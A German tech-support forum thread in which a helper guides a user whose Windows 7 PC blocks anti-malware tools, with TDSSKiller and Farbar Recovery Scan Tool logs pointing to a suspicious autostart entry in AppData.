21:57:46.0289 0x1a10 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
21:57:46.0411 0x1a10 Sidebar - ok
21:57:46.0457 0x1a10 [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
21:57:46.0513 0x1a10 mctadmin - ok
21:57:46.0549 0x1a10 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
21:57:46.0617 0x1a10 Sidebar - ok
21:57:46.0627 0x1a10 [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
21:57:46.0666 0x1a10 mctadmin - ok
21:57:46.0773 0x1a10 [ 687C288D76E984B7B6F5F8CA6D5BC030, 3CFDE8C579F8D06FF919DE07F831E6A29EE7C9416911B547A2EC196D0945D257 ] C:\Users\XXXXXXXX\AppData\Local\Jwixfip\rxarbalcy.bqezd
21:57:47.0104 0x1a10 - detected UnsignedFile.Multi.Generic ( 1 )
21:57:47.0814 0x1a10 ( UnsignedFile.Multi.Generic ) - warning
21:57:47.0821 0x1a10 Waiting for KSN requests completion. In queue: 166
21:57:48.0872 0x1a10 AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.10.209.0 ), 0x61000 ( enabled : updated )
21:57:48.0921 0x1a10 Win FW state via NFP2: enabled ( trusted )
21:57:49.0380 0x1a10 ============================================================
21:57:49.0380 0x1a10 Scan finished
21:57:49.0380 0x1a10 ============================================================
21:57:49.0392 0x1a08 Detected object count: 1
21:57:49.0392 0x1a08 Actual detected object count: 1
21:58:30.0244 0x1a08 ( UnsignedFile.Multi.Generic ) - skipped by user
21:58:30.0244 0x1a08 ( UnsignedFile.Multi.Generic ) - User select action: Skip
ich habe es geschafft das Farbar's Recovery Scan Tool mit dem IE herunterzuladen aber wenn ich es als admin ausführe öffnet es sich nur kurz und bevor ich noch was tun kann, schliesst es sich schon wieder. also keine chance für schritt #1 Bei mir läuft wie gesagt nur windows firewall und keine AVs. Hab auch die firewall deaktiviert, gleiches Ergebnis. IE erlaubt immerhin den download(ohne Browser schliessen und windows neustart) findet die Datei aber extrem suspekt. ok, ich hoffe du meldest dich nochmal entschuldigung, habs grad erst gelesen: " In der Regel antworte ich dir innerhalb von 24 Stunden, oft sogar wesentlich schneller. Jedoch habe auch ich einen normalen Beruf und Familie. Ich bin daher nicht jeden Tag stundenlag hier im Forum unterwegs. Es kann unter Umständen bis zu 2 Tage dauern, bis du eine Antwort von mir erhältst. Sollte diese Zeit überschritten sein, so kannst du mir gerne eine PM als Erinnerung schicken. " Geändert von ranxero (01.10.2017 um 21:06 Uhr) |
|
02.10.2017, 19:47
| #8 |
| /// TB-Ausbilder | Anti Malware Programme lassen sich nicht mehr starten Servus, lade dir FRST von einem sauberen Rechner auf einen USB-Stick und schließe den USB-Stick an den Problemrechner an. Starte von dort FRST. |
|
02.10.2017, 19:53
| #9 |
| | Anti Malware Programme lassen sich nicht mehr starten ok, das kann ich allerdings erst morgen machen. ich melde mich dann wieder. vielen dank nochmal |
|
02.10.2017, 20:49
| #10 |
| /// TB-Ausbilder | Anti Malware Programme lassen sich nicht mehr starten Ok, bis dann. |
|
03.10.2017, 14:30
| #11 |
| | Anti Malware Programme lassen sich nicht mehr starten es geht nicht hab mir FRST auf 2 usb sticks geladen, 1x von nem sauberen rechner aus, das andere aus nem internetcafe, ging auch alles problemlos, keine meldungen wegen sicherheit etc. der eine stick war gebraucht, der andere ist komplett neu ... hab von beiden sticks aus versucht FRST zu starten. gleicher Effekt, das programm kommt kurz hoch und ist dann sofort wieder weg. keine chance irgendwas zu starten. |
|
03.10.2017, 15:12
| #12 |
| /// TB-Ausbilder | Anti Malware Programme lassen sich nicht mehr starten Servus, wir können noch versuchen, FRST im Reparaturmodus über den USB-Stick zu starten: Scan mit Farbar's Recovery Scan Tool (Recovery Mode - Windows Vista, 7, 8) Hinweise für Windows 8-Nutzer: Anleitung 1 (FRST-Variante) und Anleitung 2 (zweiter Teil) |
|
03.10.2017, 21:47
| #13 |
| | Anti Malware Programme lassen sich nicht mehr starten hähä hat geklappt. ich fand die Auflistung etwas verwirrend. Vielleicht für andere, mitlesende hier Vorgehensweise unter Win7: #1 Starte den Rechner neu. #2 Während dem Hochfahren drücke mehrmals die F8 Taste #3 Abgesichterter Mlodus mit Eingabeaufforderung mittels Pfeiltasten wählen und Enter ... windows started dann im abgesicherten Modus #4 ganz normal einloggen ... die schwarze Eingabeaufforderung kommt hoch -> Gib nun bitte notepad ein und drücke Enter. -> Im öffnenden Textdokument: Datei > Speichern unter... und wähle Computer. Hier wird dir der Laufwerksbuchstabe deines USB Sticks angezeigt, merke ihn dir. -> Schließe Notepad wieder -> Gib nun bitte folgenden Befehl ein. e:\frst.exe bzw. e:\frst64.exe Hinweis: e steht für den Laufwerksbuchstaben deines USB Sticks, den du dir gemerkt hast. Gegebenfalls anpassen. -> Akzeptiere den Disclaimer mit Ja und klicke Untersuchen hier mein FRST.txt FRST Logfile: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-10-2017 01
durchgeführt von xxxxxx (Administrator) auf xxxxxxPC (03-10-2017 22:16:57)
Gestartet von F:\
Geladene Profile: xxxxxx (Verfügbare Profile: xxxxxx)
Platform: Windows 7 Professional Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Safe Mode (minimal)
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [NUSB3MON] => C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe [97280 2012-04-11] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7546072 2014-03-10] (Realtek Semiconductor)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3935400 2015-07-06] (Synaptics Incorporated)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-02-07] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [380680 2014-08-20] (Hewlett-Packard Development Company, L.P.)
HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\Run: [*Soxfevi<*>] => "C:\Users\xxxxxx\AppData\Local\Jwixfip\rxarbalcy.bqezd" <==== ACHTUNG (Wertname mit invaliden Zeichen)
HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\MountPoints2: {543c64fc-fbab-11e4-bf1a-2c337a7e62aa} - G:\SETUP.EXE
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk [2015-05-17]
ShortcutTarget: Adobe Gamma Loader.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bitmeter2.lnk [2017-09-22]
ShortcutTarget: Bitmeter2.lnk -> C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe ()
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\..\Interfaces\{F8953A7D-9C43-4646-839A-B1AB93FEB40A}: [DhcpNameServer] 192.168.8.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2012-02-14] (Advanced Micro Devices)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_65\bin\ssv.dll [2015-10-28] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-28] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2012-02-14] (Advanced Micro Devices)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-28] (Oracle Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-28] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF DefaultProfile: 2al5sams.default-1499987813602
FF ProfilePath: C:\Users\xxxxxx\AppData\Roaming\Mozilla\Firefox\Profiles\2al5sams.default-1499987813602 [2017-10-03]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_130.dll [2017-09-13] ()
FF Plugin: @java.com/DTPlugin,version=11.65.2 -> C:\Windows\system32\npdeployJava1.dll [2015-10-28] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-28] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-28] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_130.dll [2017-09-13] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1224194.dll [2016-02-19] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-28] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-08-01] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @citrixonline.com/appdetectorplugin -> C:\Users\xxxxxx\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-02-24] (Citrix Online)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\xxxxxx\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @talk.google.com/O1DPlugin -> C:\Users\xxxxxx\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @tools.google.com/Google Update;version=3 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @tools.google.com/Google Update;version=9 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @zoom.us/ZoomVideoPlugin -> C:\Users\xxxxxx\AppData\Roaming\Zoom\bin\npzoomplugin.dll [2017-06-28] (Zoom Video Communications, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\xxxxxx\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\xxxxxx\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default [2017-10-03]
CHR Extension: (Google Slides) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-05-17]
CHR Extension: (Google Docs) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-17]
CHR Extension: (Google Drive) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-14]
CHR Extension: (YouTube) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-10]
CHR Extension: (Google Search) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-14]
CHR Extension: (Google Sheets) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-05-17]
CHR Extension: (Google Docs Offline) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16]
CHR Extension: (Vue.js devtools) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhdogjmejiglipccpnnnanhbledajbpd [2017-07-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Gmail) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-17]
CHR Extension: (Chrome Media Router) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-09-27]
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
ACHTUNG: => Signaturenvergleich konnte nicht durchgeführt werden. Kryptografischer Dienst läuft nicht.
S3 bigsql.bam2; C:\projects\PostgreSQL\bam2\bin\bam.exe [103936 2016-10-26] (Apache Software Foundation)
S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [387128 2017-05-24] (BlueStack Systems, Inc.)
S2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [369720 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [406584 2017-05-24] (BlueStack Systems, Inc.)
S4 chip1click; C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe [91136 2016-10-27] (Chip Digital GmbH)
S3 Disc Soft Lite Bus Service; C:\projects\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.)
S4 OracleJobSchedulerXE; c:\projects\oraclexe\app\oracle\product\11.2.0\server\Bin\extjob.exe [45568 2014-05-29] ()
S4 OracleMTSRecoveryService; C:\projects\oraclexe\app\oracle\product\11.2.0\server\BIN\omtsreco.exe [81408 2014-05-29] (Oracle Corporation)
S3 OracleServiceXE; c:\projects\oraclexe\app\oracle\product\11.2.0\server\bin\ORACLE.EXE [147110912 2014-05-30] (Oracle Corporation)
S3 OracleXEClrAgent; C:\projects\oraclexe\app\oracle\product\11.2.0\server\bin\OraClrAgnt.exe [83968 2014-05-29] (Oracle Corporation)
S3 OracleXETNSListener; C:\projects\oraclexe\app\oracle\product\11.2.0\server\BIN\tnslsnr.exe [522240 2014-05-29] (Oracle Corporation)
S3 PostgreSQL 9.6 Server; C:\projects\PostgreSQL\pg96\pgservice.exe [103936 2016-10-26] (Apache Software Foundation)
S2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-09] (Realtek Semiconductor)
S2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [237736 2015-07-06] (Synaptics Incorporated)
S2 TeamViewer; C:\projects\TeamViewer\TeamViewer_Service.exe [10803440 2017-08-29] (TeamViewer GmbH)
S2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [41472 2014-01-01] (Validity Sensors, Inc.)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-09-06] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2014-04-24] (Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 amdkmcsp; C:\Windows\System32\DRIVERS\amdkmcsp.sys [95080 2017-06-12] (Advanced Micro Devices, Inc. )
R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36608 2013-12-14] (Advanced Micro Devices, Inc.)
R1 amdpsp; C:\Windows\System32\DRIVERS\amdpsp.sys [239976 2017-06-12] (Advanced Micro Devices, Inc. )
S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2017-05-24] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2017-05-22] (Bluestack System Inc. )
S1 CLVirtualDrive; C:\Windows\System32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-07-15] (Disc Soft Ltd)
S3 L6PODHDBEAN; C:\Windows\System32\Drivers\L6PODHDBEAN64.sys [772864 2015-04-07] (Line 6)
S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 RtkAvrcp; C:\Windows\System32\DRIVERS\RtkAvrcp.sys [61152 2012-12-28] (Realtek Semiconductor Corporation)
S3 RtkBtFilter; C:\Windows\System32\DRIVERS\RtkBtfilter.sys [559320 2014-01-14] (Realtek Semiconductor Corporation)
S3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [466648 2014-02-21] (Realsil Semiconductor Corporation)
S3 RTWlanE; C:\Windows\System32\DRIVERS\rtwlane.sys [6432256 2016-12-29] (Realtek Semiconductor Corporation )
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [29936 2014-02-26] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [31472 2014-02-26] (Synaptics Incorporated)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
U5 UnlockerDriver5; C:\projects\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-10-03 22:14 - 2017-10-03 22:15 - 000262494 _____ C:\Windows\ntbtlog.txt
2017-10-02 18:00 - 2017-10-02 18:00 - 000398519 _____ C:\Users\xxxxxx\Desktop\Ioannis-Donnerstag-1800-L 10B Aufgaben.pdf
2017-10-01 21:54 - 2017-10-01 22:12 - 000227350 _____ C:\TDSSKiller.3.1.0.15_01.10.2017_21.54.37_log.txt
2017-10-01 21:52 - 2017-10-01 21:53 - 004922400 _____ (AO Kaspersky Lab) C:\Users\xxxxxx\Desktop\tdsskiller.exe
2017-10-01 21:17 - 2017-10-01 21:23 - 000003232 _____ C:\Users\xxxxxx\Desktop\Rkill.txt
2017-10-01 21:16 - 2017-10-01 21:16 - 001792640 _____ (Bleeping Computer, LLC) C:\Users\xxxxxx\Desktop\rkill.com
2017-10-01 19:49 - 2017-10-01 19:49 - 000000000 ____D C:\ProgramData\MB2Migration
2017-10-01 19:47 - 2017-10-01 19:47 - 001532424 _____ (CHIP Digital GmbH) C:\Users\xxxxxx\Downloads\Malwarebytes Malware Scanner - CHIP-Installer.exe
2017-09-29 17:59 - 2017-09-29 17:59 - 000000000 ____D C:\Users\xxxxxx\Documents\Zoom
2017-09-29 12:32 - 2017-09-29 12:32 - 000251036 _____ C:\Users\xxxxxx\Downloads\PHPMailer-master.zip
2017-09-29 12:32 - 2017-09-29 12:32 - 000000000 ____D C:\Users\xxxxxx\Downloads\PHPMailer-master-php5
2017-09-28 23:02 - 2017-09-28 23:11 - 000000000 ____D C:\Users\xxxxxx\Downloads\phpmailer-test
2017-09-27 14:12 - 2017-09-27 14:14 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\Mxyzixi
2017-09-27 13:45 - 2017-09-27 13:45 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\Jwixfip
2017-09-27 11:56 - 2017-09-27 11:56 - 000072888 _____ C:\Users\xxxxxx\Downloads\2017-09-13_Rechnung_Kundennr_109504505.pdf
2017-09-26 09:59 - 2017-09-26 10:31 - 000000000 ____D C:\Users\xxxxxx\Desktop\Git-tutorial-all
2017-09-25 14:25 - 2017-09-29 10:45 - 000000000 ____D C:\Users\xxxxxx\Desktop\Natty-whole-app-latest
2017-09-24 10:26 - 2017-09-24 10:26 - 000245200 _____ C:\Users\xxxxxx\Downloads\Lisa-SQL-klausur-1.zip
2017-09-23 12:27 - 2017-09-23 12:27 - 000004125 _____ C:\Users\xxxxxx\Downloads\ClientFormLogin.java
2017-09-22 12:18 - 2017-10-03 22:10 - 000000000 ____D C:\ProgramData\Bitmeter2
2017-09-22 12:18 - 2017-09-23 01:44 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\Bitmeter2
2017-09-22 12:18 - 2017-09-22 12:18 - 001433942 _____ C:\Users\xxxxxx\Downloads\BitMeterInstaller.exe
2017-09-22 12:18 - 2017-09-22 12:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitMeter
2017-09-22 12:18 - 2017-09-22 12:18 - 000000000 ____D C:\Program Files (x86)\Codebox
2017-09-22 12:15 - 2017-09-22 19:21 - 000000000 ____D C:\Program Files (x86)\NetMeter
2017-09-22 12:06 - 2017-09-23 01:44 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\NetMeter
2017-09-21 19:04 - 2017-09-21 19:04 - 000002928 _____ C:\Users\xxxxxx\Downloads\script.php
2017-09-19 23:13 - 2017-09-19 23:13 - 000000000 ____D C:\Program Files\NetSpeedMonitor
2017-09-14 23:01 - 2017-08-19 17:28 - 000197120 _____ (Microsoft Corporation) C:\Windows\system32\shdocvw.dll
2017-09-14 23:01 - 2017-08-19 17:10 - 000180224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shdocvw.dll
2017-09-14 23:01 - 2017-08-16 17:29 - 000806912 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-09-14 23:01 - 2017-08-16 17:10 - 000629760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
